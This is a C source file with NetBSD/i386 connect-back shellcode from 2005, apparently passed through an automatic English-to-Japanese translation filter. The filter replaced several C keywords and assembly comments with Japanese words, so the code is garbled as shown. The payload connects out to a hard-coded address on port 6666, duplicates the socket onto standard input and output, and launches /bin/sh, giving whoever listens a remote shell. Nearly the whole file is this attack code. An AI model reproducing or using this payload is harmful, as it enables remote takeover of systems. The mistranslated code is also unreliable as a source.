|
このページはEtoJ逐語翻訳フィルタによって翻訳生成されました。 |
/*
* minervini at neuralnoise dot com (c) 2005
* NetBSD/i386 2.0, callback shellcode (port 6666);
*/
#含む "sys/types.h"
#含む "stdio.h"
#含む "string.h"
char scode[] =
"\x31\xc0" // xor %eax,%eax
"\x31\xc9" // xor %ecx,%ecx
"\x50" // 押し進める %eax
"\x40" // inc %eax
"\x50" // 押し進める %eax
"\x40" // inc %eax
"\x50" // 押し進める %eax
"\x50" // 押し進める %eax
"\xb0\x61" // mov $0x61,%al
"\xcd\x80" // int $0x80
"\x89\xc3" // mov %eax,%ebx
"\x89\xe2" // mov %esp,%edx
"\x49" // dec %ecx
"\x51" // 押し進める %ecx
"\x51" // 押し進める %ecx
"\x41" // inc %ecx
"\x68\xf5\xff\xff\xfd" // 押し進める $0xfdfffff5
"\x68\xff\xfd\xe5\xf5" // 押し進める $0xf5e5fdff
"\xb1\x10" // mov $0x10,%cl
"\x51" // 押し進める %ecx
"\xf6\x12" // notb (%edx)
"\x4a" // dec %edx
"\xe2\xfb" // 宙返り飛行 .-3
"\xf6\x12" // notb (%edx)
"\x52" // 押し進める %edx
"\x50" // 押し進める %eax
"\x50" // 押し進める %eax
"\xb0\x62" // mov $0x62,%al
"\xcd\x80" // int $0x80
"\xb1\x03" // mov $0x3,%cl
"\x49" // dec %ecx
"\x51" // 押し進める %ecx
"\x41" // inc %ecx
"\x53" // 押し進める %ebx
"\x50" // 押し進める %eax
"\xb0\x5a" // mov $0x5a,%al
"\xcd\x80" // int $0x80
"\xe2\xf5" // 宙返り飛行 .-9
"\x51" // 押し進める %ecx
"\x68\x2f\x2f\x73\x68" // 押し進める $0x68732f2f
"\x68\x2f\x62\x69\x6e" // 押し進める $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x51" // 押し進める %ecx
"\x54" // 押し進める %esp
"\x53" // 押し進める %ebx
"\x50" // 押し進める %eax
"\xb0\x3b" // mov $0x3b,%al
"\xcd\x80"; // int $0x80
int main() {
scode[23] = ~10;
scode[24] = ~0;
scode[25] = ~0;
scode[26] = ~2;
無効の (*code) () = (無効の *) scode;
printf("length: %d\n", strlen(scode));
code();
return (0);
}